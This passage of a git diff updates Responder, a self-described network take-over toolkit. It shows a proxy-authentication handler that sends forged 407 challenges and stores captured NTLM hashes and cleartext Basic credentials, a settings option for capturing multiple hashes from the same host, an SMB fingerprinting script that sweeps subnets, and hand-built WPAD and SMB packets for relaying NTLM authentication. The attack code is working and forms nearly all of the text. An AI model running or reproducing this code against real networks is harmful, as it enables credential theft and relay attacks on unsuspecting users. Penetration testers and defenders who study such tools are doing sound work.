       	                ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
                        GrabUserAgent(data)
                        GrabCookie(data)
                        GrabHost(data)
   	                return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
 		else:
               		return False
 	elif Basic_Auth:
                GrabUserAgent(data)
                GrabCookie(data)
                GrabHost(data)
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
 		SaveToDb({
 			'module': 'Proxy-Auth', 
 			'type': 'Basic', 
 			'client': client, 
 			'user': ClearText_Auth.split(':')[0], 
 			'cleartext': ClearText_Auth.split(':')[1], 
 			})
 		return False
 	else:
 		if settings.Config.Basic:
 			Response = WPAD_Basic_407_Ans()
 			if settings.Config.Verbose:
 				print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client)
 		else:
 			Response = WPAD_Auth_407_Ans()
 		return str(Response)
 class Proxy_Auth(SocketServer.BaseRequestHandler):
    def handle(self):
 		try:
                    for x in range(2):
                        data = self.request.recv(4096)
                        self.request.send(PacketSequence(data, self.client_address[0]))
 		except:
                   	pass
--- a/settings.py
+++ b/settings.py
@@ -20,7 +20,7 @@ import subprocess
 from utils import *
-__version__ = 'Responder 2.3.1'
+__version__ = 'Responder 2.3.2.5'
 class Settings:
@@ -147,30 +147,35 @@ class Settings:
 		self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
 		# Auto Ignore List
-		self.AutoIgnore                 = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
+		self.AutoIgnore                       = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
-		self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
+		self.CaptureMultipleCredentials       = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
-		self.AutoIgnoreList             = []
+                self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
 		self.AutoIgnoreList                   = []
 		# CLI options
-		self.LM_On_Off       = options.LM_On_Off
+                self.ExternalIP         = options.ExternalIP
-		self.WPAD_On_Off     = options.WPAD_On_Off
+		self.LM_On_Off          = options.LM_On_Off
-		self.Wredirect       = options.Wredirect
+		self.WPAD_On_Off        = options.WPAD_On_Off
-		self.NBTNSDomain     = options.NBTNSDomain
+		self.Wredirect          = options.Wredirect
-		self.Basic           = options.Basic
+		self.NBTNSDomain        = options.NBTNSDomain
-		self.Finger_On_Off   = options.Finger
+		self.Basic              = options.Basic
-		self.Interface       = options.Interface
+		self.Finger_On_Off      = options.Finger
-		self.OURIP           = options.OURIP
+		self.Interface          = options.Interface
-		self.Force_WPAD_Auth = options.Force_WPAD_Auth
+		self.OURIP              = options.OURIP
-		self.Upstream_Proxy  = options.Upstream_Proxy
+		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
-		self.AnalyzeMode     = options.Analyze
+		self.Upstream_Proxy     = options.Upstream_Proxy
-		self.Verbose         = options.Verbose
+		self.AnalyzeMode        = options.Analyze
-		self.CommandLine     = str(sys.argv)
+		self.Verbose            = options.Verbose
 		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
 		self.CommandLine        = str(sys.argv)
                if self.ExternalIP:
                        self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
 		if self.HtmlToInject is None:
 			self.HtmlToInject = ''
-		self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
+                self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
 		self.IP_aton         = socket.inet_aton(self.Bind_To)
 		self.Os_version      = sys.platform
@@ -190,18 +195,13 @@ class Settings:
 		logging.warning('Responder Started: %s' % self.CommandLine)
 		Formatter = logging.Formatter('%(asctime)s - %(message)s')
                CLog_Handler = logging.FileHandler(self.ResponderConfigDump, 'a')
 		PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
 		ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
                CLog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setLevel(logging.INFO)
 		ALog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setFormatter(Formatter)
 		ALog_Handler.setFormatter(Formatter)
 		self.ResponderConfigLogger = logging.getLogger('Config Dump Log')
 		self.ResponderConfigLogger.addHandler(CLog_Handler)
 		self.PoisonersLogger = logging.getLogger('Poisoners Log')
 		self.PoisonersLogger.addHandler(PLog_Handler)
@@ -212,8 +212,8 @@ class Settings:
                DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
                RoutingInfo = subprocess.check_output(["netstat", "-rn"])
                Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
-                self.ResponderConfigLogger.warning(Message)
+                utils.DumpConfig(self.ResponderConfigDump, Message)
-                self.ResponderConfigLogger.warning(str(self))
+                utils.DumpConfig(self.ResponderConfigDump,str(self))
 def init():
 	global Config
--- a/tools/RelayHTTPSMB/Finger.py
+++ b/tools/RelayHTTPSMB/Finger.py
@@ -0,0 +1,225 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import re,sys,socket,struct
 from socket import *
 from odict import OrderedDict
 __version__ = "0.3"
 Timeout = 0.5
 class Packet():
    fields = OrderedDict([
    ])
    def __init__(self, **kw):
        self.fields = OrderedDict(self.__class__.fields)
        for k,v in kw.items():
            if callable(v):
                self.fields[k] = v(self.fields[k])
            else:
                self.fields[k] = v
    def __str__(self):
        return "".join(map(str, self.fields.values()))
 def longueur(payload):
    length = struct.pack(">i", len(''.join(payload)))
    return length
 class SMBHeader(Packet):
    fields = OrderedDict([
        ("proto",      "\xff\x53\x4d\x42"),
        ("cmd",        "\x72"),
        ("error-code", "\x00\x00\x00\x00" ),
        ("flag1",      "\x00"),
        ("flag2",      "\x00\x00"),
        ("pidhigh",    "\x00\x00"),
        ("signature",  "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("reserved",   "\x00\x00"),
        ("tid",        "\x00\x00"),
        ("pid",        "\x00\x00"),
        ("uid",        "\x00\x00"),
        ("mid",        "\x00\x00"),
    ])
 class SMBNego(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x62\x00"),
        ("Data", "")
    ])
    def calculate(self):
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
 class SMBNegoData(Packet):
    fields = OrderedDict([
        ("BuffType","\x02"),
        ("Dialect", "NT LM 0.12\x00"),
    ])
 class SMBSessionFingerData(Packet):
    fields = OrderedDict([
        ("wordcount", "\x0c"),
        ("AndXCommand", "\xff"),
        ("reserved","\x00" ),
        ("andxoffset", "\x00\x00"),
        ("maxbuff","\x04\x11"),
        ("maxmpx", "\x32\x00"),
        ("vcnum","\x00\x00"),
        ("sessionkey", "\x00\x00\x00\x00"),
        ("securitybloblength","\x4a\x00"),
        ("reserved2","\x00\x00\x00\x00"),
        ("capabilities", "\xd4\x00\x00\xa0"),
        ("bcc1",""),
        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
    ])
    def calculate(self):
        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
 ##Now Lanman
 class SMBHeaderLanMan(Packet):
    fields = OrderedDict([
        ("proto", "\xff\x53\x4d\x42"),
        ("cmd", "\x72"),
        ("error-code", "\x00\x00\x00\x00" ),
        ("flag1", "\x08"),
        ("flag2", "\x01\xc8"),
        ("pidhigh", "\x00\x00"),
        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("reserved", "\x00\x00"),
        ("tid", "\x00\x00"),
        ("pid", "\x3c\x1b"),
        ("uid", "\x00\x00"),
        ("mid", "\x00\x00"),
    ])
 class SMBNegoDataLanMan(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x54\x00"),
        ("BuffType","\x02"),
        ("Dialect", "NT LM 0.12\x00"),
    ])
    def calculate(self):
        CalculateBCC = str(self.fields["BuffType"])+str(self.fields["Dialect"])
        self.fields["Bcc"] = struct.pack("<h",len(CalculateBCC))
 #####################
 def atod(a): 
    return struct.unpack("!L",inet_aton(a))[0]
 def dtoa(d): 
    return inet_ntoa(struct.pack("!L", d))
 def OsNameClientVersion(data):
 	try:
 		length = struct.unpack('<H',data[43:45])[0]
 		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
 		return OsVersion, ClientVersion
 	except:
 	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
 def GetHostnameAndDomainName(data):
 	try:
 		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
 		return Hostname, DomainJoined
 	except:
 	 	return "Could not get Hostname.", "Could not get Domain joined"
 def DomainGrab(Host):
    s = socket(AF_INET, SOCK_STREAM)
    try:
       s.settimeout(Timeout)
       s.connect(Host)
    except:
       print "Host down or port close, skipping"
       pass
    try:
       h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
       n = SMBNegoDataLanMan()
       n.calculate()
       packet0 = str(h)+str(n)
       buffer0 = longueur(packet0)+packet0
       s.send(buffer0)
       data = s.recv(2048)
       if data[8:10] == "\x72\x00":
          return GetHostnameAndDomainName(data)
    except:
       pass 
 def SmbFinger(Host):
    s = socket(AF_INET, SOCK_STREAM)
    try:
       s.settimeout(Timeout)
       s.connect(Host)
    except:
       print "Host down or port close, skipping"
       pass
    try:     
       h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
       n = SMBNego(Data = SMBNegoData())
       n.calculate()
       packet0 = str(h)+str(n)
       buffer0 = longueur(packet0)+packet0
       s.send(buffer0)
       data = s.recv(2048)
       if data[8:10] == "\x72\x00":
          head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
          t = SMBSessionFingerData()
          t.calculate() 
          packet0 = str(head)+str(t)
          buffer1 = longueur(packet0)+packet0  
          s.send(buffer1) 
          data = s.recv(2048)
       if data[8:10] == "\x73\x16":
          return OsNameClientVersion(data)
    except:
       pass
 ##################
 #run it
 def ShowResults(Host):
    s = socket(AF_INET, SOCK_STREAM)
    try:
       s.settimeout(Timeout)
       s.connect(Host)
    except:
       raise
       return False
    try:
       print "Retrieving information for %s..."%Host[0]
       OsVer, LanManClient = SmbFinger(Host)
       print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
       Hostname, DomainJoined = DomainGrab(Host)
       print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
    except:
       pass
 def RunFinger(Host):
    m = re.search("/", str(Host))
    if m :
       net,_,mask = Host.partition('/')
       mask = int(mask)
       net = atod(net)
       for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
           ShowResults((host,445))
    else:
       ShowResults((Host,445))   
--- a/tools/RelayHTTPSMB/HTTPRelayPacket.py
+++ b/tools/RelayHTTPSMB/HTTPRelayPacket.py
@@ -0,0 +1,939 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
 # (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful,
 # but WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 # GNU General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
 import sys
 import random
 import time
 from odict import OrderedDict
 import datetime
 from base64 import b64decode, b64encode
 def longueur(payload):
    length = struct.pack(">i", len(''.join(payload)))
    return length
 class Packet():
    fields = OrderedDict([
        ("data", ""),
    ])
    def __init__(self, **kw):
        self.fields = OrderedDict(self.__class__.fields)
        for k,v in kw.items():
            if callable(v):
                self.fields[k] = v(self.fields[k])
            else:
                self.fields[k] = v
    def __str__(self):
        return "".join(map(str, self.fields.values()))
 ##################HTTP Proxy Relay##########################
 def HTTPCurrentDate():
    Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
    return Date
 class WPAD_Auth_407_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
 		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
 		("Connection",    "Proxy-Connection: close\r\n"),
 		("Cache-Control",    "Cache-Control: no-cache\r\n"),
 		("Pragma",        "Pragma: no-cache\r\n"),
 		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
 class WPAD_NTLM_Challenge_Ans(Packet):
 	fields = OrderedDict([
 		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
 		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
 		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
 		("Type",          "Content-Type: text/html\r\n"),
 		("WWWAuth",       "Proxy-Authenticate: NTLM "),
 		("Payload",       ""),
 		("Payload-CRLF",  "\r\n"),
 		("Len",           "Content-Length: 0\r\n"),
 		("CRLF",          "\r\n"),
 	])
 	def calculate(self,payload):
 		self.fields["Payload"] = b64encode(payload)
 ##################SMB Relay Packet##########################
 class SMBHeader(Packet):
    fields = OrderedDict([
        ("proto", "\xff\x53\x4d\x42"),
        ("cmd", "\x72"),
        ("error-code", "\x00\x00\x00\x00" ),
        ("flag1", "\x08"),
        ("flag2", "\x01\xc8"),
        ("pidhigh", "\x00\x00"),
        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("Reserved", "\x00\x00"),
        ("tid", "\x00\x00"),
        ("pid", "\x3c\x1b"),
        ("uid", "\x00\x00"),
        ("mid", "\x00\x00"),
    ])
 class SMBNegoCairo(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x00"),
        ("Bcc", "\x62\x00"),
        ("Data", "")
    ])
    def calculate(self):
        self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
 class SMBNegoCairoData(Packet):
    fields = OrderedDict([
        ("Separator1","\x02" ),
        ("Dialect1", "Cairo 0.xa\x00"), #Let's talk Cairo!
    ])
 class SMBSessionSetupAndxNEGO(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x0c"),
        ("AndXCommand", "\xff"),
        ("Reserved","\x00" ),
        ("AndXOffset", "\xec\x00"),              
        ("MaxBuff","\xff\xff"),
        ("MaxMPX", "\x32\x00"),
        ("VCNumber","\x00\x00"),
        ("SessionKey", "\x00\x00\x00\x00"),
        ("SecBlobLen","\x4a\x00"),
        ("Reserved2","\x00\x00\x00\x00"),
        ("Capabilities", "\xfc\xe3\x01\x80"), 
        ("Bcc","\xb1\x00"),
        ##gss api starts here.
        ("ApplicationHeaderTag","\x60"),
        ("ApplicationHeaderLen","\x48"),
        ("AsnSecMechType","\x06"),
        ("AsnSecMechLen","\x06"),
        ("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
        ("ChoosedTag","\xa0"),
        ("ChoosedTagStrLen","\x3e"),
        ("NegTokenInitSeqHeadTag","\x30"),
        ("NegTokenInitSeqHeadLen","\x3c"),
        ("NegTokenInitSeqHeadTag1","\xA0"),
        ("NegTokenInitSeqHeadLen1","\x0e"),
        ("NegTokenInitSeqNLMPTag","\x30"),
        ("NegTokenInitSeqNLMPLen","\x0c"),
        ("NegTokenInitSeqNLMPTag1","\x06"),
        ("NegTokenInitSeqNLMPTag1Len","\x0a"),
        ("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
        ("NegTokenInitSeqNLMPTag2","\xa2"),
        ("NegTokenInitSeqNLMPTag2Len","\x2a"),
        ("NegTokenInitSeqNLMPTag2Octet","\x04"),
        ("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
        ## NTLM packet ##
        ("Data",                           ""),
        ## NTLM packet ##
        ("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
        ("NativeOs","Windows 2002 Service Pack 3 2600"),
        ("NativeOsTerminator","\x00\x00"),
        ("NativeLan","Windows 2002 5.1"),
        ("NativeLanTerminator","\x00\x00\x00\x00"),
    ])
    def calculate(self): 
        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
        CompleteSMBPacketLen = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["AndXOffset"])+str(self.fields["MaxBuff"])+str(self.fields["MaxMPX"])+str(self.fields["VCNumber"])+str(self.fields["SessionKey"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])+str(self.fields["Capabilities"])+str(self.fields["Bcc"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
        SecBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
        data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
        data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
        data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
        data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
        data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
        data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
        ## Packet len
        self.fields["AndXOffset"] = struct.pack("<h", len(CompleteSMBPacketLen)+32)
        ##Buff Len
        self.fields["SecBlobLen"] = struct.pack("<h", len(SecBlobLen))
        ##Complete Buff Len
        self.fields["Bcc"] = struct.pack("<h", len(CompleteSMBPacketLen)-27)#session setup struct is 27.
        ##App Header
        self.fields["ApplicationHeaderLen"] = struct.pack("<B", len(SecBlobLen)-2)
        ##Asn Field 1
        self.fields["AsnSecMechLen"] = struct.pack("<B", len(str(self.fields["AsnSecMechStr"])))
        ##Asn Field 1
        self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
        ##SpNegoTokenLen
        self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
        ##NegoTokenInit
        self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10)) 
        ## Tag0 Len
        self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
        ## Tag0 Str Len
        self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
        ## Tag2 Len
        self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack("<B", len(data6))
        ## Tag3 Len
        self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack("<B", len(str(self.fields["Data"])))
 class SMBSessionSetupAndxAUTH(Packet):
    fields = OrderedDict([
        ("wordcount", "\x0c"),
        ("AndXCommand", "\xff"),
        ("reserved","\x00" ),
        ("andxoffset", "\xfa\x00"),
        ("maxbuff","\xff\xff"),
        ("maxmpx", "\x32\x00"),
        ("vcnum","\x01\x00"),
        ("sessionkey", "\x00\x00\x00\x00"),
        ("securitybloblength","\x59\x00"),
        ("reserved2","\x00\x00\x00\x00"),
        ("capabilities", "\xfc\xe3\x01\x80"),
        ("bcc1","\xbf\x00"), 
        ("ApplicationHeaderTag","\xa1"),
        ("ApplicationHeaderTagLenOfLen","\x81"),
        ("ApplicationHeaderLen","\xd1"),
        ("AsnSecMechType","\x30"),
        ("AsnSecMechLenOfLen","\x81"),
        ("AsnSecMechLen","\xce"),
        ("ChoosedTag","\xa2"),
        ("ChoosedTagLenOfLen","\x81"),
        ("ChoosedTagLen","\xcb"),
        ("ChoosedTag1","\x04"),
        ("ChoosedTag1StrLenOfLen","\x81"),
        ("ChoosedTag1StrLen","\xc8"),
        #### NTLM Packet ####
        ("Data",  ""),
        #### End Of SMB ####
        ("NLMPAuthMsgNull","\x00"),
        ("NativeOs","Unix"),
        ("NativeOsTerminator","\x00\x00"),
        ("ExtraNull",""),
        ("NativeLan","Samba"),
        ("NativeLanTerminator","\x00\x00"),
        ("AndxPadding",""),
        ])
    def calculate(self): 
        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
        SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
        NTLMData = str(self.fields["Data"])
 	###### ASN Stuff
        if len(NTLMData) > 255:
 	   self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
 	   self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
        else:
           self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
 	   self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
        if len(NTLMData)-8 > 255:
           self.fields["AsnSecMechLenOfLen"] = "\x82"
 	   self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
        else:
           self.fields["AsnSecMechLenOfLen"] = "\x81"
 	   self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
        if len(NTLMData)-12 > 255:
           self.fields["ChoosedTagLenOfLen"] = "\x82"
           self.fields["ChoosedTagLen"] = struct.pack(">H", len(SecurityBlobLen)-8) 
        else:
           self.fields["ChoosedTagLenOfLen"] = "\x81"
           self.fields["ChoosedTagLen"] = struct.pack(">B", len(SecurityBlobLen)-9)
        if len(NTLMData)-16 > 255:
           self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
           self.fields["ChoosedTag1StrLen"] = struct.pack(">H", len(SecurityBlobLen)-12)
        else:
           self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
           self.fields["ChoosedTag1StrLen"] = struct.pack(">B", len(SecurityBlobLen)-12)
